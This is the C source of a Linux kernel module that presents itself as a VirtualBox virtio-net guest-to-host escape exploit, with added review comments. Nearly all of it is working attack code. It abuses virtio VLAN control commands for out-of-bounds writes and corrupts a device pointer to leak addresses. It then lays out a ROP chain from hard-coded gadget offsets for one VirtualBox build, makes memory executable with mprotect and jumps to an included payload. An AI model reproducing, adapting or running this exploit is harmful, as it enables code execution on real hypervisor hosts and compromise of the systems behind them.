#include <linux/mman.h>
#include <linux/module.h>
#include <linux/pci.h>
#include <linux/virtio_net.h>
#include <linux/virtio_pci.h>

#include "payload.h"

MODULE_AUTHOR("Andy Nguyen");
MODULE_DESCRIPTION("VirtualBox virtio-net exploit");
MODULE_LICENSE("GPL");

// Selects the constant table below. It is the only table present; every value
// in it is tied to the VirtualBox build tagged r158379 and must be re-derived
// for any other build.
#define RELEASE

#ifdef RELEASE  // r158379

// Field offsets inside the fake VIRTIO_PCI_CAP_T that prepare_read_config()
// writes at FAKE_PCICAP_OFF.
#define BAR_OFF 0x4
#define OFFSET_OFF 0x8
#define LENGTH_OFF 0xc

// Field offsets inside a capability-location record (combined with the
// LOC_*_CAP_OFF values below in prepare_read_config()).
#define OFF_MMIO_OFF 0x0
#define CB_MMIO_OFF 0x2

// Offsets relative to PCI_DEV_INT_OFF.
#define DEV_INS_R3_OFF 0x40
#define PFN_CONFIG_READ_OFF 0x58

// Layout of the fake VIRTIOCORE built at FAKE_VIRTIOCORE_OFF.
#define VIRTQUEUE_SIZE 0x48

#define VIRTQUEUES_OFF 0x20
#define PCI_CFG_DATA_OFF_OFF 0x707
#define VIRTQ_SELECT_OFF 0x70a
#define LOC_COMMON_CFG_CAP_OFF 0x724
#define LOC_DEVICE_CAP_OFF 0x734

// write_bits() addresses every target relative to VLAN_FILTER_OFF; the other
// *_OFF values here live in that same offset space.
#define VLAN_FILTER_OFF 0xf94
#define FAKE_VIRTIOCORE_OFF 0x2000
#define FAKE_PCICAP_OFF 0x2300
#define PCI_DEV_INT_OFF 0x2100

#define ROP_OFF 0x2200
#define PAYLOAD_OFF 0x2400
#define STACK_OFF 0x2400

// VBoxRT.so

#define MPROTECT 0x816c0
#define RT_FILE_QUERY_SIZE 0x2370f0

// VBoxDD.so

#define RT_FILE_QUERY_SIZE_PLT 0x570028

#define VIRTIO_R3_PCI_CONFIG_READ_OFF 0x16c330

// 0x000000000016a8ea : push rdi ; jmp qword ptr [rsi - 0x77]
#define PUSH_RDI_JMP_QWORD_PTR_RSI_MINUS_77 0x000000000016a8ea
// 0x0000000000195036 : pop rsp ; ret
#define POP_RSP_RET 0x0000000000195036

// 0x00000000000e88f4 : pop rax ; ret
#define POP_RAX_RET 0x00000000000e88f4
// 0x0000000000054d33 : pop rdi ; add al, 0x89 ; ret
#define POP_RDI_ADD_AL_89_RET 0x0000000000054d33
// 0x000000000010ec0e : pop rsi ; ret
#define POP_RSI_RET 0x000000000010ec0e
// 0x000000000009f7f3 : pop rdx ; ret
#define POP_RDX_RET 0x000000000009f7f3

// 0x0000000000205798 : mov qword ptr [rsi], rax ; ret
#define MOV_QWORD_PTR_RSI_RAX_RET 0x0000000000205798
// 0x000000000022e6f8 : mov rax, qword ptr [rax] ; ret
#define MOV_RAX_QWORD_PTR_RAX_RET 0x000000000022e6f8
// 0x00000000000d7d02 : add rax, rsi ; ret
#define ADD_RAX_RSI_RET 0x00000000000d7d02

#endif

// Value stored into the fake capability's BAR field by prepare_read_config().
#define VIRTIO_REGION_PCI_CAP 2

/*
 * Locally declared view of the virtio-pci transport's per-device struct,
 * used in this file only to reach pci_dev from a virtio_device.
 * NOTE(review): this assumes the kernel's own struct virtio_pci_device starts
 * with exactly these two members in this order — confirm against the target
 * kernel's drivers/virtio/virtio_pci_common.h before building.
 */
struct virtio_pci_device {
  struct virtio_device vdev;
  struct pci_dev *pci_dev;
};

/* Returns the virtio_pci_device that embeds `vdev` as its vdev member. */
static struct virtio_pci_device *to_vp_device(struct virtio_device *vdev) {
  return container_of(vdev, struct virtio_pci_device, vdev);
}

/*
 * Buffer for one virtio-net control-queue request as built by write_bits():
 * command header (out), device-written ack status (in), and VLAN id (out).
 * NOTE(review): write_bits() maps `vid` with length sizeof(vid) + 3, which
 * appears to extend past the end of this struct; it therefore relies on the
 * allocation being larger than sizeof(struct control_buf) — confirm.
 */
struct control_buf {
  struct virtio_net_ctrl_hdr hdr;
  virtio_net_ctrl_ack status;
  __virtio16 vid;
};

/*
 * Per-device driver state, allocated by exploit_probe() and stored in
 * vdev->priv. vqs[] holds the "rx", "tx" and "ctrl" queues in that order;
 * write_bits() submits on vqs[2].
 */
struct virtexp_info {
  struct virtio_device *vdev;
  struct virtio_pci_device *vp_dev;
  struct virtqueue *vqs[3];
  struct control_buf *ctrl;
};

/*
 * Writes the low `bits` bits of `val`, one bit per control-queue request.
 *
 * Bit i is sent as a VIRTIO_NET_CTRL_VLAN command: VLAN_ADD when the bit is
 * set, VLAN_DEL when it is clear, using VLAN id (off - VLAN_FILTER_OFF) * 8 + i.
 * Each request is submitted on vi->vqs[2] (two device-readable buffers, one
 * device-writable status byte). The function then spins until the device
 * returns the buffer or the queue is reported broken.
 *
 * NOTE(review): `1LL << i` with i == 63 shifts into the sign bit of a signed
 * type, which ISO C leaves undefined; `1ULL << i` would avoid that. The
 * return value of virtqueue_add_sgs() is also ignored.
 */
static void write_bits(struct virtexp_info *vi, u16 off, u64 val,
                       unsigned bits) {
  struct scatterlist sgs[3];
  struct scatterlist *psgs[3];
  unsigned tmp;
  unsigned i;

  for (i = 0; i < bits; i++) {
    vi->ctrl->hdr.class = VIRTIO_NET_CTRL_VLAN;
    vi->ctrl->hdr.cmd = (val & (1LL << i) ? VIRTIO_NET_CTRL_VLAN_ADD
                                          : VIRTIO_NET_CTRL_VLAN_DEL);
    vi->ctrl->vid = cpu_to_virtio16(vi->vdev, (off - VLAN_FILTER_OFF) * 8 + i);
    vi->ctrl->status = ~0;

    sg_init_one(&sgs[0], &vi->ctrl->hdr, sizeof(vi->ctrl->hdr));
    // Size needs + 3 because there is a bug in VirtualBox
    sg_init_one(&sgs[1], &vi->ctrl->vid, sizeof(vi->ctrl->vid) + 3);
    sg_init_one(&sgs[2], &vi->ctrl->status, sizeof(vi->ctrl->status));

    psgs[0] = &sgs[0];
    psgs[1] = &sgs[1];
    psgs[2] = &sgs[2];

    // 2 out (hdr, vid) + 1 in (status).
    virtqueue_add_sgs(vi->vqs[2], psgs, 2, 1, vi, GFP_ATOMIC);

    virtqueue_kick(vi->vqs[2]);

    // Busy-wait for completion: the queue has no callback (see exploit_probe).
    while (!virtqueue_get_buf(vi->vqs[2], &tmp) &&
           !virtqueue_is_broken(vi->vqs[2]))
      cpu_relax();
  }
}

/*
 * Fixed-width wrappers around write_bits(): each emits the low 64/32/16/8
 * bits of `val`, addressed from `off` exactly as write_bits() does.
 *
 * write_bits() returns void, so it is called as a plain statement. ISO C
 * forbids `return expr;` in a void function (C11 6.8.6.4p1), even when the
 * expression itself has type void; the previous form only compiled as a GNU
 * extension.
 */
static void write64(struct virtexp_info *vi, u16 off, u64 val) {
  write_bits(vi, off, val, 64);
}

static void write32(struct virtexp_info *vi, u16 off, u32 val) {
  write_bits(vi, off, val, 32);
}

static void write16(struct virtexp_info *vi, u16 off, u16 val) {
  write_bits(vi, off, val, 16);
}

static void write8(struct virtexp_info *vi, u16 off, u8 val) {
  write_bits(vi, off, val, 8);
}

/*
 * Prepares device state so that the next PCI config-space read at offset 0
 * is served through a fake capability covering [off, off + len).
 *
 * Writes a fake VIRTIOCORE at FAKE_VIRTIOCORE_OFF and a fake VIRTIO_PCI_CAP_T
 * at FAKE_PCICAP_OFF. It then overwrites the low byte of the pointer stored at
 * PCI_DEV_INT_OFF + DEV_INS_R3_OFF with 0x10. Every store goes through the
 * write*() helpers, so this issues one control-queue request per bit written.
 */
static void prepare_read_config(struct virtexp_info *vi, u32 off, u32 len) {
  // Fake VIRTIOCORE
  write8(vi, FAKE_VIRTIOCORE_OFF + PCI_CFG_DATA_OFF_OFF, 0);
  write16(vi, FAKE_VIRTIOCORE_OFF + VIRTQ_SELECT_OFF,
          ((PCI_DEV_INT_OFF + DEV_INS_R3_OFF) -
           (FAKE_VIRTIOCORE_OFF + VIRTQUEUES_OFF)) /
              VIRTQUEUE_SIZE);
  write16(vi, FAKE_VIRTIOCORE_OFF + LOC_COMMON_CFG_CAP_OFF + OFF_MMIO_OFF, 0);
  write16(vi, FAKE_VIRTIOCORE_OFF + LOC_COMMON_CFG_CAP_OFF + CB_MMIO_OFF,
          0xffff);
  write16(vi, FAKE_VIRTIOCORE_OFF + LOC_DEVICE_CAP_OFF + OFF_MMIO_OFF, 0);
  write16(vi, FAKE_VIRTIOCORE_OFF + LOC_DEVICE_CAP_OFF + CB_MMIO_OFF, 0);

  // Fake VIRTIO_PCI_CAP_T
  write8(vi, FAKE_PCICAP_OFF + BAR_OFF, VIRTIO_REGION_PCI_CAP);
  write32(vi, FAKE_PCICAP_OFF + OFFSET_OFF, off);
  write32(vi, FAKE_PCICAP_OFF + LENGTH_OFF, len);

  // Partially corrupt pDevInsR3 pointer to cause a type confusion:
  // - pvInstanceDataR3 (0x18) -> pCritSectRoR3 (0x28)
  // - pPciCfgCap (0x1a8) -> pCommonCfgCap (0x1b8)
  write8(vi, PCI_DEV_INT_OFF + DEV_INS_R3_OFF, 0x10);
}

/*
 * Arms prepare_read_config() for a 4-byte window at `off`, then reads PCI
 * config-space dword 0 and returns whatever the device reports.
 */
static u32 read_config32(struct virtexp_info *vi, u32 off) {
  struct pci_dev *pdev = vi->vp_dev->pci_dev;
  u32 result;

  prepare_read_config(vi, off, sizeof(u32));
  pci_read_config_dword(pdev, 0, &result);

  return result;
}

/* 16-bit counterpart of read_config32(): 2-byte window, config word 0. */
static u16 read_config16(struct virtexp_info *vi, u32 off) {
  struct pci_dev *pdev = vi->vp_dev->pci_dev;
  u16 result;

  prepare_read_config(vi, off, sizeof(u16));
  pci_read_config_word(pdev, 0, &result);

  return result;
}

/*
 * Runs the escape in three stages, using only the write*() and read_config*()
 * helpers:
 *   1. read back pDevInsR3 (32 bits at a time) and virtioR3PciConfigRead
 *      (16 bits at a time), and derive VBoxDD_base from the latter;
 *   2. copy payload_bin to PAYLOAD_OFF and lay out a sequence of 64-bit
 *      values at ROP_OFF;
 *   3. overwrite the pDevInsR3 and pfnConfigRead slots, store the POP_RSP_RET
 *      gadget at PCI_DEV_INT_OFF - 0x77, and trigger via a config-space read.
 * Every offset and gadget address is a RELEASE constant, valid only for that
 * build.
 * NOTE(review): payload_bin / payload_bin_len are presumably provided by
 * payload.h — confirm.
 */
static void escape(struct virtexp_info *vi) {
  u64 pDevInsR3;
  u64 virtioR3PciConfigRead;
  u64 VBoxDD_base;
  unsigned tmp;
  unsigned i;

  // STAGE 1: Leak pointers

  pDevInsR3 = (u64)read_config32(vi, VIRTIO_PCI_COMMON_Q_DESCHI) << 32 |
              (u64)read_config32(vi, VIRTIO_PCI_COMMON_Q_DESCLO);
  pDevInsR3 -= 0x10;
  printk("pDevInsR3: %llx\n", pDevInsR3);

  virtioR3PciConfigRead =
      (u64)read_config16(vi, VIRTIO_PCI_COMMON_Q_SIZE) << 48 |
      (u64)read_config16(vi, VIRTIO_PCI_COMMON_Q_NOFF) << 32 |
      (u64)read_config16(vi, VIRTIO_PCI_COMMON_Q_ENABLE) << 16 |
      (u64)read_config16(vi, VIRTIO_PCI_COMMON_Q_MSIX);
  printk("virtioR3PciConfigRead: %llx\n", virtioR3PciConfigRead);

  VBoxDD_base = virtioR3PciConfigRead - VIRTIO_R3_PCI_CONFIG_READ_OFF;
  printk("VBoxDD_base: %llx\n", VBoxDD_base);

  // STAGE 2: Build ROP chain

  // Copy payload
  for (i = 0; i < payload_bin_len; i++) {
    write8(vi, PAYLOAD_OFF + i, payload_bin[i]);
  }

  // Dynamically resolve mprotect
  write64(vi, ROP_OFF + 0x00, VBoxDD_base + POP_RAX_RET);
  write64(vi, ROP_OFF + 0x08, VBoxDD_base + RT_FILE_QUERY_SIZE_PLT);
  write64(vi, ROP_OFF + 0x10, VBoxDD_base + MOV_RAX_QWORD_PTR_RAX_RET);
  write64(vi, ROP_OFF + 0x18, VBoxDD_base + POP_RSI_RET);
  write64(vi, ROP_OFF + 0x20, -RT_FILE_QUERY_SIZE + MPROTECT);
  write64(vi, ROP_OFF + 0x28, VBoxDD_base + ADD_RAX_RSI_RET);
  write64(vi, ROP_OFF + 0x30, VBoxDD_base + POP_RSI_RET);
  write64(vi, ROP_OFF + 0x38, pDevInsR3 + ROP_OFF + 0x78);
  write64(vi, ROP_OFF + 0x40, VBoxDD_base + MOV_QWORD_PTR_RSI_RAX_RET);

  // Call mprotect
  write64(vi, ROP_OFF + 0x48, VBoxDD_base + POP_RDI_ADD_AL_89_RET);
  write64(vi, ROP_OFF + 0x50, pDevInsR3 + 0x2000);
  write64(vi, ROP_OFF + 0x58, VBoxDD_base + POP_RSI_RET);
  write64(vi, ROP_OFF + 0x60, 0x1000);
  write64(vi, ROP_OFF + 0x68, VBoxDD_base + POP_RDX_RET);
  write64(vi, ROP_OFF + 0x70, PROT_READ | PROT_WRITE | PROT_EXEC);
  write64(vi, ROP_OFF + 0x78, 0xDEADBEEF);  // mprotect

  // Jump to payload
  write64(vi, ROP_OFF + 0x80, VBoxDD_base + POP_RDI_ADD_AL_89_RET);
  write64(vi, ROP_OFF + 0x88, VBoxDD_base);
  write64(vi, ROP_OFF + 0x90, VBoxDD_base + POP_RSI_RET);
  write64(vi, ROP_OFF + 0x98, pDevInsR3 + STACK_OFF);
  write64(vi, ROP_OFF + 0xa0, pDevInsR3 + PAYLOAD_OFF);

  // STAGE 3: Code execution

  // Corrupt pDevInsR3 pointer
  write64(vi, PCI_DEV_INT_OFF + DEV_INS_R3_OFF, pDevInsR3 + ROP_OFF);

  // Corrupt pfnConfigRead pointer
  write64(vi, PCI_DEV_INT_OFF + PFN_CONFIG_READ_OFF,
          VBoxDD_base + PUSH_RDI_JMP_QWORD_PTR_RSI_MINUS_77);

  // Set stack pivot gadget
  write64(vi, PCI_DEV_INT_OFF - 0x77, VBoxDD_base + POP_RSP_RET);

  // Trigger pfnConfigRead dereference
  pci_read_config_dword(vi->vp_dev->pci_dev, 0, &tmp);
}

/*
 * Probe callback: allocates per-device state and a control buffer, sets up
 * three virtqueues ("rx", "tx", "ctrl") without callbacks, marks the device
 * ready and runs escape().
 *
 * Returns 0 on success, -ENOMEM if an allocation fails, or the error from
 * virtio_find_vqs(). On failure every allocation made here is released and
 * vdev->priv is cleared. Previously `vi` leaked when the ctrl allocation
 * failed, and both buffers leaked (with vdev->priv left dangling) when queue
 * setup failed; remove() is not called for a failed probe.
 */
static int exploit_probe(struct virtio_device *vdev) {
  static vq_callback_t *callbacks[] = {NULL, NULL, NULL};
  static const char *names[] = {"rx", "tx", "ctrl"};
  struct virtexp_info *vi;
  int ret;

  vi = kzalloc(sizeof(*vi), GFP_KERNEL);
  if (!vi) return -ENOMEM;

  vi->ctrl = kzalloc(sizeof(*vi->ctrl), GFP_KERNEL);
  if (!vi->ctrl) {
    ret = -ENOMEM;
    goto err_free_vi;
  }

  vi->vp_dev = to_vp_device(vdev);

  vi->vdev = vdev;
  vdev->priv = vi;

  // callbacks[] and names[] each have one entry per slot of vi->vqs.
  ret = virtio_find_vqs(vdev, ARRAY_SIZE(vi->vqs), vi->vqs, callbacks, names,
                        NULL);
  if (ret) goto err_free_ctrl;

  virtio_device_ready(vdev);

  escape(vi);

  return 0;

err_free_ctrl:
  vdev->priv = NULL;
  kfree(vi->ctrl);
err_free_vi:
  kfree(vi);
  return ret;
}

static void exploit_remove(struct virtio_device *vdev) {
  struct virtexp_info *vi = vdev->priv;

  vdev->config->reset(vdev);
  vdev->config->del_vqs(vdev);
  kfree(vi->ctrl);
  kfree(vi);
}

/* Bind to any virtio network device, regardless of vendor. */
static const struct virtio_device_id exploit_ids[] = {
    {.device = VIRTIO_ID_NET, .vendor = VIRTIO_DEV_ANY_ID},
    {0},
};
MODULE_DEVICE_TABLE(virtio, exploit_ids);

/*
 * The driver requests no device features. The former `features[] = {}` was a
 * zero-length array, which is a GNU extension rather than ISO C. Leaving
 * .feature_table unset (NULL, size 0) requests the same empty feature set.
 * The id table is const because the driver core only reads it.
 */
static struct virtio_driver exploit = {
    .driver.name = "exploit",
    .driver.owner = THIS_MODULE,
    .id_table = exploit_ids,
    .probe = exploit_probe,
    .remove = exploit_remove,
};

module_virtio_driver(exploit);
